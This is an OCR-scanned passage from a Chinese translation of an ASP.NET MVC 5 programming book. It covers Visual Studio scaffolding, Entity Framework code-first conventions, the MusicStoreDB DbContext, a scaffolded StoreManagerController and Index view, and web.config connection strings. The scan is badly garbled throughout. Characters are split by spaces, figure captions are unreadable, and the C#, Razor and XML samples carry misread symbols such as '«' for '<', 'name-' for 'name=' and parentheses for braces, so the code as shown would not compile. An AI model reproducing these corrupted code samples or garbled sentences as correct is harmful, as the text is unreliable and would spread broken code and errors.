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e 同样 重要 的 是 , 在 编译 应 用 程序 之 前 ， 下 一 节 介绍 的 Visual Studio 基 架 对 话 框 中 不 会 
显示 新 添加 的 类 。 在 使 用 基 架 系统 前 编译 应 用 程序 不 只 是 一 种 良好 实践 ， 对 于 在 基 架 
对 话 框 中 显示 任何 新 模型 或 修改 后 的 模型 ， 这 是 必要 操作 。 


4.2 为 商店 管理 器 构造 基 架 


创建 了 模型 类 之 后 ， 就 可 以 创建 商店 管理 器 了 。 商 店 管理 器 是 一 个 可 用 来 编辑 专辑 信息 
的 控制 器 。 可 以 选择 的 一 种 做 法 是 像 第 2 章 那 样 手动 编写 控制 器 代码 , 然后 为 每 个 控制 器 操作 
创建 所 有 必要 的 视图 。 几 次 之 后 ， 就 会 发 现 这 种 方法 的 重复 性 很 强 。 那 么 ， 是 不 是 可 以 在 一 
定 程度 上 自动 完成 这 个 过 程 呢 ? 幸运 的 是 , 答案 是 肯定 的 , 我 们 只 需要 使 用 接 下 来 介绍 的 “ 基 


42.1. 基 架 的 含义 


在 第 3 章 的 “添加 视图 ”一 节 中 ， 我 们 看 到 Add View 对 话 框 允许 选择 一 个 用 来 创建 视图 
代码 的 模板 。 这 种 代码 生成 过 程 就 叫做 “ 基 架 ”， 其 用 途 并 没有 局 限于 创建 视图 。 

ASPNET MVC 中 的 基 架 可 以 为 应 用 程序 的 创建 、 读 取 、 更 新 和 删除 (CRUD) 功 能 生成 所 
需 的 样板 代码 。 基 架 模 板 检测 模型 类 (如 刚才 创建 的 Album 类 ) 的 定义 , 然后 生成 控制 器 以 及 与 
该 控制 器 关联 的 视图 ， 有 些 情况 下 还 会 生成 数据 访问 类 。 基 架 知道 如 何 命名 控制 器 、 命 名 视 
图 以 及 每 个 组 件 需 要 执行 什么 代码 ， 也 知道 在 应 用 程序 中 如 何 放置 这 些 项 以 使 应 用 程序 正常 
玉 作 。 


基 架 选项 


像 MVC 框 架 的 所 有 其 他 项 一 样 ， 如 果 不 喜 欢 默认 的 基 架 ， 就 可 以 根据 自己 的 需要 自 定义 
基 架 或 蔡 换 现 有 基 架 的 代码 生成 机 制 。 也 可 以 通过 NuGet( 搜 索 scaffolding) 查 找 可 蔡 代 的 基 架 
模板 。NuGet 库 中 全 是 运用 特定 设计 模式 和 技术 来 生成 代码 的 基 架 。 

如 果 确 实 不 喜欢 基 架 ， 也 可 以 从 零 开 始 手工 设计 所 有 内 容 。 基 架 对 于 创建 应 用 程序 来 说 
不 是 不 可 或 缺 的 ， 但 是 利用 基 架 会 为 应 用 程序 开发 节省 很 多 时 间 。 


虽然 不 要 期 望 基 架 能 够 创建 整个 应 用 程序 ， 但 是 基 架 可 以 让 开发 人 员 从 琐碎 繁杂 的 工作 
中 解脱 出 来 ， 例 如 ， 基 架 可 以 代劳 在 正确 位 置 创建 文件 的 操作 ， 避 免 了 开发 人 员 完全 手动 来 
编写 程序 代码 。 可 以 调整 和 编辑 基 架 生成 的 代码 来 创建 自己 的 应 用 程序 。 基 架 只 有 在 允许 运 
行 的 时 候 才 会 运行 ， 所 以 不 必 担心 代码 生成 器 会 覆盖 对 输出 文件 的 修改 。 

MVC 5 中 包含 有 各 种 基 加 模板。 不同 基 架 模板 的 代码 生成 量 不 同 ， 所 以 选择 不 同 的 基 架 
模板 就 会 有 不 同 的 基 架 代码 生成 量 。 下 面 介 绍 一 些 常用 的 模板 。 


1. MVC 5 Controller——Empty 


Empty Controller 模 板 会 向 Controllers 文 件 夹 中 添加 一 个 具有 指定 名 称 且 派 生 自 Controller 的 
类 (控制 器 )。 这 个 控制 器 带 有 的 唯一 操作 就 是 Index 操 作 ， 且 在 其 内 部 除了 返回 一 个 默认 
ViewResult 实 例 的 代码 之 外 ， 没 有 其 他 任何 代码 。 这 个 模板 不 会 生成 任何 视图 。 
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2. MVC 5 Controller with read/write Actions 


这 个 模板 会 向 项 目 中 添加 一 个 带 有 Index、Details、Create、Edit 和 Delete 操 作 的 控制 器 。 
虽然 控制 器 内 部 的 操作 不 是 完全 空白 ， 但 不 会 执行 任何 有 实际 意义 的 操作 ， 除 非 向 其 中 添加 
自己 的 代码 并 为 它们 创建 视图 。 


3.Web API 2 API Controller Scaffolders 


有 几 个 模板 向 项 目 中 添加 一 个 继承 自 基 类 ApiController 的 控制 器 。 可 以 使 用 这 些 模板 为 
应 用 程序 创建 Web API。 第 11 章 将 详细 介绍 Web API。 


4. MVC 5 Controller with Views, Using Entity Framework 


这 个 模板 就 是 下 面 创建 商店 控制 器 时 将 要 选择 的 模板 ， 因 为 它 不 仅 生成 了 带 有 整套 
JIndex、Details、Create、Edit 和 Delete 操 作 的 控制 器 及 其 需要 的 所 有 相关 视图 ， 而 且 还 生成 了 
与 数据 库 交互 (持久 保存 数据 到 数据 库 或 从 数据 库 中 读 取 数据 ) 的 代码 。 

为 了 让 模板 产生 合适 的 代码 , 需要 选择 一 个 模型 类 (这 里 选择 的 是 Album 类 )。 基 架 会 检测 
所 选择 模型 的 所 有 属性 ， 然 后 利用 这 些 信息 来 创建 控制 器 、 视 图 和 数据 访问 代码 。 

为 了 生成 数据 访问 代码 ， 基 架 需 要 一 个 数据 上 下 文 对 象 的 名 称 。 这 里 可 以 为 基 架 指定 一 
个 现 有 的 数据 上 下 文 ， 也 可 以 根据 需要 创建 一 个 新 的 数据 上 下 文 。 什 么 是 数据 上 下 文 呢 ? 要 
说 明 这 个 问题 ， 就 必须 首先 了 解 一 下 实体 框架 。 


4.2.2 ” 基 架 和 实体 框架 


新 建 的 ASPNET MVC 5 项 目 会 自动 包含 对 实体 框架 (EF) 的 引用 。EF 是 一 个 对 象 关系 映射 
(object-relational mapping，ORM) 框 架 ， 它 不 但 知道 如 何在 关系 型 数据 库 中 保存 NET 对 象 ， 
而 且 还 可 以 利用 LINQ 查 询 语句 检索 那些 保存 在 关系 型 数据 库 中 的 .NET 对 象 。 


灵活 的 数据 选项 
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如 果 不 想 在 ASPNET MVC 应 用 程序 中 使 用 实体 框架 , 也 是 可 以 的 。 框架 中 没有 强制 要 求 
与 EF 建立 依赖 关系 的 机 制 , 我 们 可 以 使 用 自己 喜欢 的 任何 ORM 或 数据 访问 库 。 事实 上 , 框架 
中 也 没有 强制 必须 使 用 数据 库 ( 不 管 是 不 是 关系 型 的 数据 库 )。 可 以 使 用 任何 数据 访问 技术 或 
数据 源 来 构建 应 用 程序 ， 比 如 ,使 用 用 逗号 分 隔 的 文本 文件 或 者 采用 使 用 了 全 套 WS-* 协 议 组 
件 的 Web 服 务 。 

本 章 使 用 的 是 EF， 但 是 涉及 的 许多 主题 都 可 以 广泛 地 应 用 于 任何 数据 源 或 ORM。 


EF 支 持 数据 库 优先 、 模 型 优先 和 代码 优先 的 开发 风格 : MVC 基 架 采 用 代码 优先 的 风格 。 
代码 优先 是 指 可 以 在 不 创建 数据 库 模 式 、 也 不 打开 Visual Studio 设 计 器 的 情况 下 ， 向 SQL 
Server 中 存储 或 检索 信息 。 可 以 编写 纯 C# 类 , 因为 EF 知 道 如 何 将 这 些 类 的 实例 存储 到 正确 位 置 。 

还 记得 模型 对 象 中 的 所 有 属性 都 是 虚拟 的 吗 ? 虚拟 属性 不 是 必需 的 , 但 是 它们 给 EF 提供 
一 个 指向 纯 C# 类 集 的 钧 子 (hook)， 并 为 EF 启用 了 一 些 特性 ， 如 高 效 的 修改 跟踪 机 制 (efficient 
change tracking mechanism)。EF 和 需要 知道 模型 属性 值 的 修改 时 刻 ， 因 为 它 要 在 这 一 时 刻 生成 
并 执行 一 个 SQLUPDATE 语 句 ， 使 这 些 改变 和 数据 库 保 持 一 致 。 
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谁 应 该 放 在 第 一 位 ， 代 码 还 是 数据 库 ? 


如 果 我 们 已 经 熟悉 了 实体 框架 ， 并 且 还 在 使 用 模型 优先 或 数据 库 优先 方法 进行 开发 ， 那 
么 我 们 是 幸运 的 ， 因为 MVC 基 架 也 将 支持 这 样 做 。 实体 框架 团队 设计 的 代码 优先 方案 为 我 们 
提供 了 无 障碍 的 环境 来 处 理 重 复 的 编码 和 数据 库 工作 。 


1. 代码 优先 约定 


为 了 使 开发 生活 变 得 更 轻松 ，EF 像 ASPNET MVC 一 样 ， 遵 照 了 很 多 约定 。 例 如 ， 如 果 
想 把 一 个 Album 类 型 的 对 象 存储 在 数据 库 中 ， 那 么 EF 就 假设 是 把 数据 存储 在 数据 库 中 一 个 名 
为 Albums 的 表 中 ; 如 果 要 存储 的 对 象 中 有 一 个 名 为 ID 的 属性 ，EF 就 假设 这 个 属性 值 就 是 主键 
值 ， 并 把 这 个 值 赋 给 SQL Server 中 对 应 的 自动 递增 (标识 ) 键 列 。 

EF 对 于 外 键 关 系 、 数 据 库 名 称 等 也 有 约定 。 这 些 约定 取代 了 以 前 需要 提供 给 一 个 关系 对 
象 映射 框架 的 所 有 了 映射 和 配置 。 当 从 头 开始 编写 应 用 程序 时 ， 代 码 优先 方法 会 发 挥 很 大 的 作 
。 如 果 要 用 现 有 的 数据 库 ， 那 么 需要 提供 映射 元 数据 (可 能 是 使 用 实体 框架 的 模式 优先 方法 
开发 的 )。 如 果 想 更 多 地 了 解 实体 框架 ， 可 以 从 MSDN 上 的 Data Developer. Center AF 
(http://msdn.microsoft.com/en-us/data/ ee712907)。 


自 定义 约定 


x 


如 果 EF 中 的 默认 约定 与 想 要 建立 数据 模型 的 方式 不 一 致 , 应 该 怎么 办 ? 在 以 前 的 EF 版 本 
中 ， 解 决 方法 是 使 用 数据 注解 或 者 FluentAPI， 或 者 无 奈 地 使 用 默认 约定 ， 因 为 手动 配置 所 有 
选项 太 乏 味 了 。 

EF 6 通过 添加 对 自 定义 约定 的 支持 改进 了 这 一 点 。 使 用 自 定义 约定 可 以 覆盖 主键 定义 ， 
或 者 改变 默认 的 表 映 射 ， 以 满足 自己 的 团队 命名 约定 。 更 好 的 是 ， 可 以 创建 可 重用 的 约定 类 
和 特性 ， 应 用 到 任何 模型 或 属性 上 。 这 样 便 可 以 同时 得 到 两 种 方法 的 好 处 ， 既 可 以 按照 自己 
的 需要 精确 配置 ， 又 可 以 像 标 准 的 EF 开发 一 样 轻松 。 

关于 EF6 自 定义 约定 的 更 多 信息 ， 请 阅读 这 篇 MSDN 文 章 : http://msdn.microsoft.com/ 
en-us/data/jj819164.. 

2. DbContext 类 

当 使 用 EF 的 代码 优先 方法 时 ， 需 要 使 用 从 EF 的 DbContext 类 派生 出 的 一 个 类 来 访问 数据 
库 。 该 派生 类 具有 一 个 或 多 个 DbSet<T> 类 型 的 属性 ， 类 型 DbSet<T> 中 的 每 一 个 T 代 表 一 个 想 
要 持久 保存 的 对 象 。 可 以 把 DbSet<T> 想 象 成 一 个 特殊 的 、 可 以 感知 数据 的 泛 型 列表 ， 它 知 
道 如 何在 父 上 下 文中 加 载 和 保存 数据 。 例如 , 下面 的 类 就 可 以 用 来 存储 和 检索 Album、Artist 
和 Genre 的 信息 : 


public class MusicStoreDB : DbContext 


public DbSet«Album» Albums ( get; set; } 
public DbSet«Artist» Artists ( get; set; } 
public DbSet«Genre» Genres { get; set; } 


使 用 先前 的 数据 上 下 文 ， 可 以 通过 使 用 LINQ 查 询 ， 按 字母 顺序 检索 出 所 有 专辑 ， 代 码 如 
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var db = new MusicStoreDB(); 

var allAlbums = from album in db.Albums 
orderby album.Title ascending 
select album; 


现在 了 解 了 一 点 关于 内 置 基 架 模板 的 技术 ， 下 面 将 继续 讲解 基 架 生成 代码 的 过 程 。 
选择 数据 访问 策略 


到 目前 为 止 ， 已 经 出 现 有 很 多 种 不 同 的 数据 访问 方法 ， 并 且 方 法 的 选用 不 仅 依赖 于 所 要 
创建 的 应 用 程序 类 型 ,而 且 也 依赖 于 开发 人 员 的 个 性 (或 者 说 开发 团队 的 个 性 )。 事实 上 , 没 
有 一 种 数据 访问 策略 适用 于 所 有 应 用 程序 和 所 有 开发 团队 。 

本 章 中 的 方法 使 用 Visual Studio 开 发 工具 ， 以 便 快 速 启动 和 运行 应 用 程序 。 这 样 做 对 于 代 
码 没有 什么 明显 的 错误 ， 然 而 ， 对 于 一 些 开 发 人 员 和 项 目 ， 这 种 方法 就 太 简单 了 。 本 章 中 使 
用 的 基 架 假设 我 们 创建 的 应 用 程序 需要 实现 基本 的 create、read、update 和 delete(CRUD) 功 能 。 
现 有 的 很 多 应 用 程序 只 提供 CRUD 功 能 和 基本 的 验证 功能 , 以 及 少量 的 工作 流程 和 业务 规则 。 
对 于 这 样 的 应 用 程序 ， 基 架 能 发 挥 很 好 的 作用 。 

对 于 更 复杂 的 应 用 程序 ， 我 们 想 探讨 不 同 的 架构 和 设计 模式 来 满足 我 们 的 需求 。 领 域 驱 
动 设计 (domain-driven design，DDD) 是 一 种 团队 使 用 的 方法 ， 可 用 来 处 理 复杂 的 应 用 程序 。 
命令 查询 职责 分 离 (command-query responsibility segregation，CQRS) 也 是 一 种 团队 开发 模式 ， 
它 在 复杂 的 应 用 程序 开发 中 占有 主要 份额 。 

DDD 和 CQRS 中 使 用 的 流行 设计 模式 包括 库 和 工作 单元 设计 模式 。 如 果 想 更 多 地 了 解 这 
些 设计 模式 ， 可 参阅 http://msdn.microsoft.com/en-us/library/ 征 714955.aspx。 库 设计 模式 的 优势 
之 一 是 ， 我 们 可 在 数据 访问 代码 和 程序 其 他 部 分 之 间 创 建 一 个 正常 边界 。 这 个 边界 可 以 提高 
代码 单元 测试 的 能 力 ， 这 不 是 默认 基 架 生成 代码 的 优势 之 一 ， 因 为 硬 编码 依赖 于 实体 框架 。 


4.2.3 ”执行 基 架 模板 


介绍 完 必要 的 理论 基础 后 , 现在 是 时 候 使 用 基 架 构建 一 个 控制 器 了 ! 执 行 下 面 的 步 又 即 可 : 
(1) 右 击 Controllers 文 件 夹 ， 选 择 Add | Controller. Add Scaffold 对 话 框 将 会 打开 ， 如 图 4-4 
所 示 。 该 对 话 框 中 列 出 了 前 面 讨论 过 的 基 架 模板 。 


如 cs controler -Empty 


— 


Mig enini Controler -Empty 
— 
ER 

Mg Metern rendhete 
E 


Web AP12 OData Controle with action. 
Cd iran 


图 4-4 
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(2) 选择 MVC 5 Controller with views, using Entity Framework， 然 后 单 击 Add 按 钮 ， 打 开 
对 应 的 Add Controller 对 话 框 。 

(3) 在 Add Controller 对 话 框 中 (如 图 4-5 所 示 ), 将 控制 器 名 称 修改 为 StoreManagerController，, 
并 选择 Album 作 为 Model class 的 类 型 。 注意 Add 按 钮 是 禁用 的 ， 因 为 现在 还 没有 选择 数据 上 下 
文 类 。 接 下 来 我 们 就 完成 这 些 工作 。 


Add Controller 


Controller name: 

StoreManagerController 

L7] Use async controller actions 
Model class 

Album (MveMusicStore Models) 
Data contes class 

7 | [New data contes... 

Views: 
V. Generate views 
IV Reference script libraries 
回 Use a layout page: 


(Leave empty if it is set in a Razor _viewstart file) 


图 4-5 


Visual Studio 2013 和 MVC 5 中 的 变化 

如 果 使 用 过 以 前 版 本 的 ASPNET MVC, 会 注意 到 这 里 多 了 一 步 。 原 来 ， 基 架 模 板 的 选择 
是 包含 在 Add Controller 对 话 框 中 的 。 改 变 模板 时 ， 该 对 话 框 中 的 其 他 选项 也 会 改变 ， 与 所 选 
模板 的 可 用 选项 匹配 。 

ASPNET 团 队 意识 到 基 架 对 于 整个 ASPNET 都 很 有 价值 ， 并 不 是 只 适合 MVC。 因 此 ， 他 
们 在 Visual Studio 2013 中 修改 了 基 架 系统 ， 使 其 可 在 整个 ASPNET 平 台 上 使 用 。 由 于 这 种 改 
变 , 首先 选择 基 架 模板 , 然后 选择 基 架 输入 更 加 合适 , 因为 基 架 可 能 是 MVC 控 制 器 、Web API 
控制 器 、Web Forms 页 面 (可 作为 Visual Studio 扩 展 ， 从 此 网 址 获得 : 
http://msdn.microsoft.com/en-us/library/ 作 714955.aspx)， 甚 至 是 一 个 自 定义 基 架 。 


注意 记 住 , 如果 在 Model class 下 拉 列 表 中 找 不 到 Album， 最 可 能 的 原因 是 添加 

To 了 模型 类 以 后 没有 编译 项 目 。 如 果 确实 是 这 个 原因 ， 就 需要 退出 基 架 对 话 框 ， 

| 使 用 Build | Build Solution 菜 单项 生成 项 目 ， 然 后 再 次 启动 Add Controller 对 话 框 。 

| | 
(4) 单 击 New data context 按 钮 ， 启 动 New Data Context 对 话 框 ， 如 图 4-6 所 示 。 该 对 话 框 只 

有 一 个 文本 框 ， 用 于 输入 访问 数据 库 时 使 用 的 类 的 名 称 (包括 该 类 的 名 称 空间 )。 


New data contest type: 
MvcMusicStore Models MusicStoreDB 


图 4-6 
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(5) 将 数据 上 下 文 命名 为 MusicStoreDB， 如 图 4-6 所 示 ， 然 后 单 击 Add 按 钮 ， 这 样 就 设置 
好 了 上 下 文 的 名 称 。 现在 Add Controller 对 话 框 包含 了 所 有 必要 的 信息 , 所 以 Add 按 钮 已 被 启用 。 

(6) 确认 完成 后 的 对 话 框 如 图 4-7 所 示 ， 然 后 单 击 Add 按 钮 ， 为 Album 类 建立 
StoreManagerController 及 其 相关 的 视图 。 


Controller name: 
StoreManagerController 

[C] Use async controller actions 

Model class: 
Album (MveMusicStore Models) 

Data contest class 
MvcMusicStore Models. MusicStoreDB 


Views: 
[Z Generate views 

[V Reference script libraries 
[V] Use a layout page: 


(Leave empty if itis set in a Razor. viewstart file) 


图 4-7 
单 击 Add 按 钮 后 ， 基 架 将 在 项 目的 多 个 位 置 添加 新 文件 。 在 继续 讲解 之 前 ， 下 面 首先 探 
讨 这 些 新 文件 。 
1. 数据 上 下 文 


基 架 会 在 项 目的 Models 文 件 夹 中 添加 MusicStoreDB.cs 文 件 。 文 件 中 的 类 继承 了 实体 框架 
的 DbContext 类 , 可 以 用 来 访问 数据 库 中 的 专辑 、 流 派 和 艺术 家 信息 。 尽 管 只 告知 了 基 架 Album 
类 ， 但 是 它 看 到 了 相关 的 模型 并 把 它们 也 包含 在 了 上 下 文中 ， 如 程序 清单 4-4 所 示 。 


程序 清单 4-4  MusicStoreDB(DbContext) 


public class MusicStoreDB : DbContext 


{ 
7/ 
// 
fF 
// 
-4 
{7 
// 


You can add custom code to this file. Changes will not be overwritten. 


If you want Entity Framework to drop and regenerate your database 
automatically whenever you change your model schema, 

please use data migrations. 

For more information refer to the documentation: 
http://msdn.microsoft.com/en-us/data/jj591621.aspx 


public MusicStoreDB() : base("name-MusicStoreDB") 


t 
$ 


public DbSet<MvcMusicStore.Models.Album> Albums { get; set; } 


public DbSet<MvcMusicStore.Models.Artist> Artists { get; set; } 


public DbSet<MvcMusicStore.Models.Genre> Genres { get; set; } 
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实体 框架 数据 迁移 简介 
上 下 文 类 顶部 长 长 的 注释 说 明了 两 点 : 
e. 现在 代码 归 我 们 所 有 。DbContext 的 创建 是 一 次 性 完成 的 ， 所 以 可 以 自由 修改 这 个 类 ， 
不 用 担心 所 做 修改 会 被 重 写 。 

e. 代码 归 我 们 负责 。 我 们 需要 确保 对 模型 类 所 做 的 修改 能 够 会 反映 到 数据 库 中 ， 反 之 亦 
然 , 即 对 数据 库 的 修改 也 会 反映 到 模型 类 中 。EF 通 过 使 用 数据 迁移 来 帮 我 们 完成 这 项 
工作 。 

EF 4.3 中 引入 的 数据 迁移 是 一 种 系统 的 、 基 于 代码 的 方法 ， 用 于 将 更 改 应 用 到 数据 库 。 
数据 迁移 允许 在 创建 和 优化 模型 定义 时 ， 保 留 数据 库 中 的 现 有 数据 。 修 改 模型 时 ，EF 能 够 跟 
踪 更 改 ， 并 创建 可 应 用 到 数据 库 的 迁移 脚本 。 进 行 修改 时 ， 还 可 以 配置 数据 迁移 来 删除 和 重 
新 生成 数据 库 ， 这 在 仍然 试图 找 出 对 数据 库 建 模 的 最 佳 方式 时 十 分 方便 。 

数据 迁移 是 一 个 重要 概念 ， 但 是 本 章 只 是 简介 模型 ， 所 以 对 数据 迁移 的 讨论 不 在 本 章 范 
围 内 。 第 16 章 将 更 加 详细 地 介绍 迁移 。 本 章 后 面 将 指出 几 个 例外 情况 ， 说 明 在 使 用 迁移 时 ， 
工作 方式 上 存在 的 重要 区 别 。 


想 要 访问 数据 库 ， 只 需要 实例 化 这 个 数据 上 下 文 类 。 现 在 可 能 极 想 知道 上 下 文 要 使 用 什 
么 样 的 数据 库 ， 这 个 问题 将 在 后 面 运行 应 用 程序 时 给 出 回答 。 


2. StoreManagerController 


选择 的 基 架 模板 也 会 生成 StoreManagerController 类 , 并 将 其 放 在 应 用 程序 的 Controllers 文 件 夹 
下 。 这 个 控制 器 拥有 选择 和 编辑 专辑 信息 所 需 的 所 有 代码 。 程 序 清单 4-5 列 出 了 该 类 定义 的 
前 几 行 代码 : 


程序 清单 4-5 ”StoreManagerController 一 一 节选 


public class StoreManagerController : Controller 
{ 
private MusicStoreDB db = new MusicStoreDB(); 


// GET: /StoreManager/ 
public ActionResult Index() 
ii 
var albums = db.Albums.Include(a -» a.Artist).Include(a -» a.Genre); 
return View(albums.ToList()); 
) 
// more later ... 


在 这 段 代码 的 前 面部 分 ,会 看 到 基 架 为 控制 器 添加 了 一 个 MusicStoreDB 类 型 的 私有 字段 。 
由 于 控制 器 中 的 每 个 操作 都 要 访问 数据 库 ， 因 此 基 架 用 一 个 新 的 数据 上 下 文 实例 来 初始 化 这 
个 字段 。 在 Index 操 作 中 ， 可 以 看 到 这 样 的 代码 ， 它 使 用 上 下 文 将 数据 库 中 的 所 有 专辑 加 载 到 
一 个 列表 中 ， 并 将 列表 作为 模型 传递 给 默认 视图 。 

加 载 相关 对 象 

在 Index 操 作 中 Include 方 法 的 调用 告知 实体 框架 在 加 载 一 个 专辑 的 相关 流派 和 艺术 家 信 
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息 时 采用 预 加 载 策略 。 预 加 载 策略 就 尽 其 所 能 地 使 用 查询 语句 加 载 所 有 数据 。 
实体 框架 的 另 一 种 (默认 的 ) 策 略 是 延迟 加 载 策略 。 使 用 延迟 加 载 策略 ，EF 在 LINQ 查 询 中 
只 加 载 主 要 对 象 (专辑 ) 的 数据 ， 而 不 填充 Genre 和 Artist 属 性 : 


var albums = db.Albums; 


延迟 加 载 根据 需要 来 加 载 相关 数 据 , 也 就 是 说 ,只 有 当 需 要 Album 的 Genre 或 Artist 属 性 时 ， 
EF 才 会 通过 向 数据 库 发 送 一 个 额外 的 查询 来 加 载 这 些 数据 。 然 而 不 巧 的 是 ， 当 处 理 专辑 信息 
时 ， 延 迟 加 载 策略 会 强制 框架 为 列表 中 的 每 一 个 专辑 向 数据 库 发 送 一 个 额外 的 查询 。 对 于 含 
有 100 个 专辑 的 列表 ， 如 果 要 加 载 所 有 的 艺术 家 数据 ， 延 迟 加 载 则 总 共 需 要 101 个 查询 。 这 里 
描述 的 情形 就 是 N+1 问 题 (因为 框架 要 执行 101 个 查询 才能 得 到 100 个 填充 了 的 对 象 ), 这 是 使 用 
对 象 关系 映射 框架 面临 的 一 个 共同 问题 。 看 来 延迟 加 载 在 带 来 便利 的 同时 可 能 也 要 付出 潜在 
的 代价 。 

这 里 可 将 Include 方 法 看 成 减少 在 构建 完整 模型 中 需要 的 查询 数量 的 一 个 优化 。 如 果 想 更 
多 地 了 解 延迟 加 载 ， 请 参阅 MSDN 上 的 “Loading Related Objects ”， 网 址 为 
http://msdn.microsoft.com/library/bb896272.aspx « 


基 架 也 生成 用 来 创建 、 编 辑 、 删 除 和 展示 专辑 信息 的 操 


ETTTTEEEENENEILII 
作 。 要 了 解 详情 ， 请 仔细 阅读 本 章 后 面 将 介绍 的 编辑 功能 ZDERILLEEN 
后 所 涉及 的 操作 。 Fe etie Doni 
bo App Start 
一 旦 基 架 运行 完成 ， 就 将 在 新 的 视图 文件 来 T 
Views/StoreManager 下 出 现 一 个 视图 集 。 这 些 视 图 为 用 户 界 面 pun 
提供 了 罗列 、 编 辑 和 删除 专辑 的 功能 ， 如 图 4-8 所 示 。 "E TER 
Index 视 图 拥有 显示 音乐 专辑 表 所 需 的 所 有 代码 。 视 图 的 eren 
模型 是 Album 对 象 的 枚 举 序列 ， 正 如 先前 在 Index 操 作 中 看 到 Pu 
的 ，Album 对 象 的 枚 举 序列 正 是 Index 操 作 传 递 的 内 容 。 视 图 Cs 
利用 这 个 模型 结合 使 用 foreach 循 环 来 创建 显示 专辑 信息 的 m anei 
HIML 表 ， 如 程序 清单 4-6 所 示 : iore 
ee ea aa a a a 站 
程序 清单 4-6 StoreManager/Index.cshtml $ M 
@model IEnumerable«MvcMusicStore.Models.Album» docu 
图 4-8 
erc 
ViewBag.Title = "Index"; 
i 
<h2>Index</h2> 
<p> 
QHtml.ActionLink("Create New", "Create") 
«/p» 
<table class-"table"» 
«tr» 
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«th»(Html.DisplayNameFor (model => model.Artist.Name)«/th» 
«th»8Html.DisplayNameFor (model => model.Genre.Name)«/th» 
«th»(Html.DisplayNameFor (model => model.Title)«/th» 
«th»8Html.DisplayNameFor (model => model.Price)«/th» 
«th»8Html.DisplayNameFor (model => model.AlbumArtUrl)«/th» 
«th»«/th» 

</tr> 


@foreach (var item in Model) { 
<tr> 
<td>@Html .DisplayFor (modelItem => item.Artist.Name)«/td» 
<td>@Html.DisplayFor (modelItem => item.Genre.Name)</td> 
<td>@Html .DisplayFor (modelItem => item.Title)</td> 
<td>@Html .DisplayFor (modelItem => item.Price)</td> 
<td>@Html .DisplayFor (modelItem => item.AlbumArtUrl)</td> 
<td> 
GHtml.ActionLink("Edit", "Edit", new ( id-item.AlbumId }) | 
(GHtml.ActionLink("Details", "Details", new ( id-item.AlbumId )) | 
GHtml.ActionLink("Delete", "Delete", new ( id-item.AlbumId }) 
«/td» 
«/tr» 
) 


«/table» 


注意 基 架 是 如 何 选择 所 有 “重要 的 ”字段 显示 给 用 户 的 。 换 名 话说， 视图 中 的 表 没有 显 
示 任 何 外 键 属性 的 值 (因为 它们 对 用 户 来 说 是 无 意义 的 )， 但 显示 了 相关 的 流派 名 称 和 艺术 家 
的 姓名 ， 这 是 如 何 实现 的 呢 ? 原来 视图 对 所 有 的 模型 输出 都 采用 了 HTML 辅 助 方法 
DisplayFor( 第 5 章 在 讨论 HTML 辅助 方法 时 将 详细 介绍 DisplayFor) « 

表 中 的 每 一 行 还 包括 编辑 、 删 除 和 详细 显示 专辑 的 链接 。 正 如 前 面 提 到 的 ， 我 们 所 看 到 
的 基 架 代码 只 是 一 个 起 点 。 接 下 来 还 可 能 需要 添加 、 删 除 和 修改 一 些 代 码 来 按照 自己 的 规格 
调整 视图 。 但 在 修改 以 前 ， 应 该 运行 一 下 应 用 程序 ， 查 看 当前 视图 的 效果 。 


4.2.4 执行 基 架 代码 

在 开始 运行 程序 之 前 ， 首 先 处 理 一 个 本 章 前 面 提 到 的 亟待 解决 的 问题 。MusicStoreDB 采 
用 什么 数据 库 ? 到 目前 为 止 尚未 为 应 用 程序 创建 数据 库 ， 甚 至 尚未 指定 数据 库 连 接 。 

1. 用 实体 框架 创建 数据 库 


EF 的 代码 优先 的 方法 会 尽 可 能 地 使 用 约定 而 非 配 置 。 如 果 不 配置 从 模型 到 数据 库 中 表 和 
列 的 具体 映射 EF 将 使 用 约定 创建 一 个 数据 库 模式 。 如 果 在 运行 时 不 配置 一 个 具体 的 数据 库 
连接 ，EF 将 按照 约定 创建 一 个 连接 。 


配置 连接 


显 式 地 为 代码 优先 数据 上 下 文 配置 连接 很 简单 , 即 向 web.config 文 件 中 添加 一 个 连接 字符 
串 。 按 照 约 定 ，EF 会 寻找 一 个 与 数据 上 下 文 类 的 名 称 一 致 的 连接 字符 串 。 这 就 允许 采用 两 种 
方式 来 控制 上 下 文 的 数据 库 连 接 。 
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首先 ， 可 以 修改 web.config 中 的 连接 字符 串 : 


«connectionStrings» 
«add name-"MusicStoreDB" 
connectionString-"data source-.MMyWonderfulServer; 
Integrated Security-SSPI; 
initial catalog-MusicStore" 
providerName-"System.Data.SqlClient" /> 
«/connectionStrings» 


其 次 ， 通 过 修改 传递 给 DbContext 的 构造 函数 的 name 参 数 ， 可 以 重 写 EF 将 为 给 定 
DbContext 使 用 的 数据 库 名 称 : 
public MusicStoreDB() : base("name-SomeOtherDatabase") 


t 
) 


这 个 name 参 数 允 许 指定 数据 库 名 称 ( 这 里 指定 了 SomeOtherDatabase 而 不 是 
MusicStoreDB)。 也 可 以 通过 这 个 name 参 数 传递 一 个 完整 的 连接 字符 串 ， 这 样 就 可 以 全 面 控制 
每 个 DbContext 的 数据 存储 。 


如 果 不 配置 具体 的 连接 , EF 将 尝试 连接 SQL Server 的 LocalDB 实 例 , 并 且 查 找 与 DbContext 
派生 类 同名 的 数据 库 。 如 果 EF 能 够 连接 到 数据 库 服 务 器 ， 但 找 不 到 数据 库 ， 那 么 框架 将 会 创 
建 一 个 数据 库 。 如 果 在 基 架 完成 后 ， 运 行 应 用 程序 ， 并 导航 到 URL 连 接 /StoreManager， 我 们 
会 发 现实 体 框架 已 经 在 LocalDB 中 创建 了 一 个 名 为 MvcMusicStore.Models.MusicStoreDB 的 数据 
库 。 如 果 想 看 新 数据 库 的 实体 数据 模型 图 ， 请 参见 图 4-9。 


3) Albums. 


Ag artist ^ 


= Properties 
df Aristid 
m 
Navigation Properties. 
F Albume 


. MigrationHistoryz& 
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如 图 4-9 所 示 ，EF 还 会 创建 一 个 叫做 ”MigrationHistory 的 表 。EF 使 用 这 个 表 来 跟踪 代码 
优先 模型 的 状态 ， 所 以 有 助 于 让 代码 优先 模型 和 数据 库 模 式 保持 一 致 。 下 面 将 简要 说 明 它 的 
用 途 。 感 兴趣 的 话 ， 就 继续 阅读 ， 如 果 不 感 兴趣 ， 可 以 跳 过 这 个 边栏 ， 因 为 这 些 内 容 对 于 本 
章 而 言 并 不 是 必要 的 。 
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在 EF 4.3 之 前 ，EF 使 用 一 个 比较 简单 的 EdmMetadata 表 来 存储 模型 类 结构 的 哈 希 值 。EF 
